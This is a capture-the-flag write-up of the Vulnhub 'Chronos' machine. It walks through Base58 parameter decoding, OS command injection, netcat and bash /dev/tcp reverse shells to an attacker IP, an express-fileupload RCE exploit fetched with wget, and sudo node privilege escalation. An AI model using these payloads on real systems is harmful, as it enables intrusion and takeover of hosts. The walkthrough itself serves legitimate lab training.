Chronos is an easy/medium machine from Vulnhub by AL1ENUM. This machine is also tested in VirtualBox. This lab is suitable for novices because it has significant bugs such as Remote Command Execution for reverse connection and a privilege escalation approach. So, let’s get started and learn how to break things down into manageable pieces.

Methodology

Network Scanning

• netdiscover
• nmap

Enumeration

• Abusing HTTP
• Intercept HTTP request
• Decode Base64 and Base58

Exploitation

• Inject Netcat reverse shell
• Sensitive data exposure (express-file upload)

Privilege Escalation

• Exploiting file express upload
• Capture the root flag 

Level: Easy-Medium

Flags concurred:

root.txt: YXBvcHNlIHNpb3BpIG1hemV1b3vtZSBvbmVpcmEK

Network Scanning

Firstly, we have to scan the network to find the Victim machine IP using the netdiscover command.

netdiscover

The IP address we get is 192.168.1.174

Nmap

Further, we ran an aggressive scan (-A) for open port enumeration where we found the following port details:

nmap -A 192.168.1.174

According to the Nmap output, we get

• on port 22 SSH server running
• on port 80 HTTP service running (Apache Server)

• on port 8000 HTTP service running (Node.js Express framework)

Enumeration

Abusing HTTP

Let’s check port 80 to see if we get anything interesting. We can verify it immediately in the browser because the Apache Server is running on port 80.

The site does not provide any valuable information, therefore we go for the source page that exposes hostnames and URL. Since the hostname has not been included in our /etc/hosts configuration file, we cannot route.

Therefore, we have updated the/etc/hosts file by adding the IP and hostname as shown in the image.

192.168.1.174 chronos.local

By browsing http://chronos.local:8000, the site response by showing time, day & date.

The URL of the above-mentioned source page was visited this time; however, the server responded with the message “permission denied.” So we decided to intercept HTTP requests for this page through the burp suite.

Decode Base64 and Base58

We intercepted the HTTP request for the GET method, which includes a format parameter with a bas64-encoded argument.

Copy the argument value and paste it into the CyberChef to encode it into base64

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

The output we get from the encoding the value looks like this

NHVnWUR1QWtTY0NHNWdNY1pqRU4zbUFMeUcxZEQ1WllzaUNmV3ZRMnc5YW5ZR3lM

Now it’s time to experiment with the repeater; let’s copy the output (base64) and request it over the repeater. For the provided base64 parameter, we received an error message for a non-base58 character, indicating that the server is encoding and decoding using the base58 function.

Copy the same parameter format value and decode it with Base58.

4ugYDuAkScCG5gMcZjEN3mALyG1dD5ZYsiCfWvQ2w9anYGyL

The outcome we get after decoding for the format value is day, date and time as an argument.

'+Today is %A, %B %d, %Y %H:%M:%S.'

Key Point: The application is calling OS functionality to execute time and date command, which means format parameter can fuzz for os command injection. Here you can try to execute any base64_encoded arbitrary system command.

Exploitation

Inject Netcat one-liner payload

It’s time to exploit remote command execution by injecting a netcat reverse shell. You can visit the given link to get the netcat reverse shell one-liner and modify the payload according to listener address and port.

URL: https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

Use the following command to make sure to change the IP.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.3 1234 >/tmp/f

Copy the payload which we have created earlier and use Base58 to encrypt this payload.

Start a Netcat listener on port 1234 for obtaining a reverse connection.

nc -lvp 1234

Modify the format value by injecting an encrypted payload and sending the request to the server.

As soon as we deliver the payload we get the reverse in our Netcat listener.

cd
ls

Sensitive data exposure (express-fileupload)

For post enumeration, we dig there are two folders in the opt directory: “chronos” and “chronos-v2”. We get into the chronos-v2 directory has further two new folders in chronos-v2: “frontend” and “backend.”

cd chronos-v2
ls
cd backend

We got four scripts inside the backend directory: “node modules”, “package.json”, “package-lock.json”, “server.js”

We can see a service called “express-fileupload version 1.1.7” in the package.json file.

ls
cat package.json

Privilege Escalation

We can see from package.json that the server is running express-fileupload version 1.1.9-alpa.3 for Node.js, therefore let’s look for any probable exploits on Google.

Luckily we found a python script to perform an EJS-RCE attack to exploit express-fileupload.

Exploiting Express Fileupload

Go to the website, download the exploit and make the changes in the host IP (Kali Machine) file and then name the file as poc.py

'bash -c "bash -i &> /dev/TCP/192.168.1.3/8888 0>&1" '

There is a need to transfer this exploit so, launch the Python server with the following command:

python -m SimpleHTTPServer 80

Let’s start the Netcat listener on new port 8888.

nc -lvp 8888

Now, download the created exploit using “wget” in the tmp folder

cd /tmp
wget http://192.168.1.3/poc.py

Once it is downloaded, now run the exploit with the following command:

python3 poc.py

Capture the root flag

We receive the limited privilege shell on our Listener as soon as we run the exploit.

Now for privilege escalation, let’s find out sudo rights for user “imera’. We found the user imera has ALL privileges to run two program node & npm.

I did a quick search and got to know that we can use Using “child_process.spawn” method to run a bash script. This bash script will give us the root shell if it gets executed properly. From

GTFOBin: https://gtfobins.github.io/gtfobins/node/

 sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

As soon as the script is getting executed, we get the root shell. Check the id and enter in the root directory.

id
cd /root

we can see the root.txt file just open the file and you will get the root flag.

ls
cat root.txt

Author: Sakshi Gurao is a Researcher and Technical Writer at Hacking Articles, Red Teamer, Penetration Tester. Contact Linkedin